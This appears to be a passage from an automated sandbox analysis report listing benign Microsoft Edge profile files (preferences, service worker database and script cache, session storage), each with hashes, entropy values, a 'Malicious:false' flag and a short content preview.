                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF319b3.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10526
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.128787106825038
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:stWkdfsk0PeIlN6xyk33d88bV+FpYQenDfJy93JPdYJ:stWssk0Pei4jbGWQenDg9Q
                                                                                                                                                                                                                                                                                                                                                              MD5:1DCEAF9EB286A9891F631C8ECA8C534F
                                                                                                                                                                                                                                                                                                                                                              SHA1:26FD6C93E9A06372D0C934268D21D812F9F97281
                                                                                                                                                                                                                                                                                                                                                              SHA-256:597C5BA10DABC3D5FB1F2783577B4DF7FDEB8FF5072236B2D8D4C776983A216A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5F2C74EDEB54429A7D80F0CCD07A3039A0EBBE5E9C87AC4A6860F2504C99006E93DF2F12DFC8CC21C951F769FE7E34DFA8EE76E2569865203886DFDD165B343D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13384336603276397","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24853
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.565703764986323
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:AWDigjWPEmfMn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQ1TIMrwEpUtuL:AWDigjWPEmfMnu1ja1VIlHtU
                                                                                                                                                                                                                                                                                                                                                              MD5:F4CDC587C5A572F0E028004A0D536765
                                                                                                                                                                                                                                                                                                                                                              SHA1:754331ABEB6E81CBD89F24B677A91F37AE97B96D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C41505AECCD27FAD6658C4361D9E70A23A5830A73A1D42D7C5EF13E2DB71CCA4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E036C1855AE6E5403F3450C3EA745A7C4E97C9A0F89931B27E3EED38441361F619E7ED25FDFEF31A115FF75C48FEC6E538752D4A1C0D533552AA3B11AE0826D1
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13384336602746429","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13384336602746429","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2571f.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24853
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.565703764986323
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:AWDigjWPEmfMn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQ1TIMrwEpUtuL:AWDigjWPEmfMnu1ja1VIlHtU
                                                                                                                                                                                                                                                                                                                                                              MD5:F4CDC587C5A572F0E028004A0D536765
                                                                                                                                                                                                                                                                                                                                                              SHA1:754331ABEB6E81CBD89F24B677A91F37AE97B96D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C41505AECCD27FAD6658C4361D9E70A23A5830A73A1D42D7C5EF13E2DB71CCA4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E036C1855AE6E5403F3450C3EA745A7C4E97C9A0F89931B27E3EED38441361F619E7ED25FDFEF31A115FF75C48FEC6E538752D4A1C0D533552AA3B11AE0826D1
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13384336602746429","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13384336602746429","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2860e.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24853
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.565703764986323
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:AWDigjWPEmfMn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQ1TIMrwEpUtuL:AWDigjWPEmfMnu1ja1VIlHtU
                                                                                                                                                                                                                                                                                                                                                              MD5:F4CDC587C5A572F0E028004A0D536765
                                                                                                                                                                                                                                                                                                                                                              SHA1:754331ABEB6E81CBD89F24B677A91F37AE97B96D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:C41505AECCD27FAD6658C4361D9E70A23A5830A73A1D42D7C5EF13E2DB71CCA4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E036C1855AE6E5403F3450C3EA745A7C4E97C9A0F89931B27E3EED38441361F619E7ED25FDFEF31A115FF75C48FEC6E538752D4A1C0D533552AA3B11AE0826D1
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13384336602746429","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13384336602746429","location":5,"ma

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1169
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.91863253295567
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:F2xc5NmY2cncmZ4R7aR/R7xcJZx0R7xC9L8pbR7aR/R7xXZq:F2emASR7aR/R7xcJZx0R7xc8pbR7aR/M
                                                                                                                                                                                                                                                                                                                                                              MD5:19A37116DDA1DD16BEB633909F55AA5E
                                                                                                                                                                                                                                                                                                                                                              SHA1:C90C4CF6853196412ED28937938333C7178B1AF8
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5D9C09D441059D274B232223F62D917BCE88B0E9696392DC1379A318B949DB04
                                                                                                                                                                                                                                                                                                                                                              SHA-512:EA30CB16A55CC483505EA6BC3E473FE1CF857162552DAE3813FE06A390C88A56016E9522542AA72C3EC2194F1B889A7E947A91D91FEEFA5CB349FD85D158F8B6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2cz.Z.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.8INITDATA_UNIQUE_ORIGIN:https://www.googletagmanager.com/..'REG:https://www.googletagmanager.com/.0.....nhttps://www.googletagmanager.com/static/service_worker/5230/sw_iframe.html?origin=https%3A%2F%2Fwww.scribd.com.ehttps://www.googletagmanager.com/static/service_worker/5230/sw.js?origin=https%3A%2F%2Fwww.scribd.com .(.0.8........@..Z.b.....trueh..h..h..h..h..p.x...............................REGID_TO_ORIGIN:0!https://www.googletagmanager.com/..RES:0.0.....ehttps://www.googletagmanager.com/static/service_worker/5230/sw.js?origin=https%3A%2F%2Fwww.scribd.com..."@06871F2BFAF96F7ACF5241CB3D596981D7A98D5B22D732863D9B837DD7343E73..URES:0..PRES:0.Sy.^...............'REG:https://www.googletagmanager.com/.0.....nhttps://www.googletagmanager.com/static/service_worker/5230/sw_iframe.html?origin=https%3A%2F%2Fwww.scribd.com.ehttps://ww

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.207107578178588
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfgPD3M1Fi23oH+TcwtE/a252KLl1fgElyq2PFi23oH+TcwtE/a2ZIFUv:7YPD3qZYeb8xL0EIvdZYeb8J2FUv
                                                                                                                                                                                                                                                                                                                                                              MD5:31D37E142EEB6F524A3B4BE0F4D77CD5
                                                                                                                                                                                                                                                                                                                                                              SHA1:18E8A01CDA6AE75DA627870AF4C0C96665BEA1EE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1E8C38BA6CFA8B4E66421435000146F17B5696B61D592F8D465811D6221F843D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9267ED84B226B6746B88B327375BD17223052ADC01833362D3C8144782B67D8C9DAED6EFC3E7CC2C37A32FA2AA88F78053157D345F694AFAEB0B322A90C64D22
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:54.516 1794 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/02/18-02:16:54.545 1794 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):26080
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.052461677833991
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:sbP6yeiUtmELjTiMSQ5egubVkJb56d4Fx1KFPwPBSmtGkbc+YnuUC4m1/VstM7NY:mVUu1oZcyfNQ
                                                                                                                                                                                                                                                                                                                                                              MD5:4049966F08F41E67B04D0F137DB5F66E
                                                                                                                                                                                                                                                                                                                                                              SHA1:3A525857777197D52750E533259788CB4D52E0AD
                                                                                                                                                                                                                                                                                                                                                              SHA-256:E799E83BBF96CF97FD1D4920D67F42F6328F799A15148341A0DF7C05C09997D8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5EF02A4BD66164674F4AF1D04B7E06F4E7623BC9CB7BD4579AE076F6797C1D00891318837B827FBDD679B0CDDF7229EDE81A3B5826FAC07B7F42FAA9E0D26ECD
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:0\r..m..........rSG.....0'use strict';var ca=function(a){function b(d){return a.next(d)}function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})},h=function(a){return ca(a())};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self;var r,x;a:{for(var da=["CLOSURE_FLAGS"],A=n,B=0;B<da.length;B++)if(A=A[da[B]],A==null){x=null;break a}x=A}var ea=x&&x[610401301];r=ea!=null?ea:!1;var E;const fa=n.navigator;E=fa?fa.userAgentData||null:null;function F(a){return r?E?E.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function G(a){var b;a:{const c=n.navigator;if(c){const d=c.userAgent;if(d){b=d;break a}}b=""}return b.indexOf(a)!=-1};function H(){return r?!!E&&E.brands.length>0:!1}function I(){return H()?F("Chromium"):(G("Chrome")||G("CriOS"))&&!(H()?0:G("Edge"))||G("Silk")};!G("Android")||I();I();!G("Safari")||I()||(H()?0:G("Coast"))||(H()?0:G("Opera

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):64689
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.933678112786823
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:hqe7mJHKwrKPWgIgb9IHDJnGDisvy9hUQ+SE7/3HYXhZ:kHJHgIgZIlXUQ+Suo
                                                                                                                                                                                                                                                                                                                                                              MD5:2A8BD8C68C7A302A5167C71450370C11
                                                                                                                                                                                                                                                                                                                                                              SHA1:970B9F14D4ADC3EE38B0865A38D468E73282A025
                                                                                                                                                                                                                                                                                                                                                              SHA-256:89B399043F667C0646FD5870F2AD57716B3768DC7B7B1A879A375D6492D5E209
                                                                                                                                                                                                                                                                                                                                                              SHA-512:DAE9FDB6F97BAD33094D06F81AB348BC5AB41844B6AD703364E1D2CC5F14F66851C088F653B4B38A1219FA1444244EF9FF89A526EDB637596D2BDB3D609D68CB
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:0\r..m..........rSG.....0....z3.................;cT...x.X........,T.5...`"......L`f....].L`*.....Rb...>....ca........1...1.......RbB.u.....da.......1...Rb..^w....ea......,T.T.`d.... L`.....0Sb..............`$.....1.`....Dan........HSb.`............Rb........fa....Rb..I.....kb....1...Rb...I....Gb....Rb.......Kb..d....................Ib.............1......Rc.X.T....brands.....R..,T.<.`8.....L`......Rc./;.....brand.....rP....Di ...........-.....-.......^.......k..U..(Sb...........I`....Da.........(....c..........@......H......tQ.p....e...https://www.googletagmanager.com/static/service_worker/5230/sw.js?origin=https%3A%2F%2Fwww.scribd.com...a........Db............D`.....)..A.`.........,T.H.`L.....L`.....@Sb................1...q.b$.............`....Da8........,.,T.0..`......L`..........Df...............-....^........(Sb.............1.`....DaT...~....t....b.............\e........@.......7........,T.0.`......L`........Df...............-....^........(Sb.............q.`....Da.....

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5166655487006326
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:324IjXl/ltl/lxEn0l1llHgLkl:GHztlYn0lUkl
                                                                                                                                                                                                                                                                                                                                                              MD5:EC44CDA526737072E09E3095316CA93E
                                                                                                                                                                                                                                                                                                                                                              SHA1:15A2B57BA0307EBC1CD9F1993DDBE804A58A9CC5
                                                                                                                                                                                                                                                                                                                                                              SHA-256:9D54026D785684B3DE5699F0404700A6F560B28962EB6629878158399E76B049
                                                                                                                                                                                                                                                                                                                                                              SHA-512:54348C3F91167A15633C6B38D372860A623BBF86D15FDA4EFA8F083653BAE2D60B0CEFFAB0447FFADCA044294153482898B08D0FE59F65E4798BDCB18D16889D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:@...B...oy retne.............c...........X....,L........c......e...../.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5166655487006326
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:324IjXl/ltl/lxEn0l1llHgLkl:GHztlYn0lUkl
                                                                                                                                                                                                                                                                                                                                                              MD5:EC44CDA526737072E09E3095316CA93E
                                                                                                                                                                                                                                                                                                                                                              SHA1:15A2B57BA0307EBC1CD9F1993DDBE804A58A9CC5
                                                                                                                                                                                                                                                                                                                                                              SHA-256:9D54026D785684B3DE5699F0404700A6F560B28962EB6629878158399E76B049
                                                                                                                                                                                                                                                                                                                                                              SHA-512:54348C3F91167A15633C6B38D372860A623BBF86D15FDA4EFA8F083653BAE2D60B0CEFFAB0447FFADCA044294153482898B08D0FE59F65E4798BDCB18D16889D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:@...B...oy retne.............c...........X....,L........c......e...../.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF28831.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5166655487006326
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:324IjXl/ltl/lxEn0l1llHgLkl:GHztlYn0lUkl
                                                                                                                                                                                                                                                                                                                                                              MD5:EC44CDA526737072E09E3095316CA93E
                                                                                                                                                                                                                                                                                                                                                              SHA1:15A2B57BA0307EBC1CD9F1993DDBE804A58A9CC5
                                                                                                                                                                                                                                                                                                                                                              SHA-256:9D54026D785684B3DE5699F0404700A6F560B28962EB6629878158399E76B049
                                                                                                                                                                                                                                                                                                                                                              SHA-512:54348C3F91167A15633C6B38D372860A623BBF86D15FDA4EFA8F083653BAE2D60B0CEFFAB0447FFADCA044294153482898B08D0FE59F65E4798BDCB18D16889D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:@...B...oy retne.............c...........X....,L........c......e...../.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):501876
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.618488246580728
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
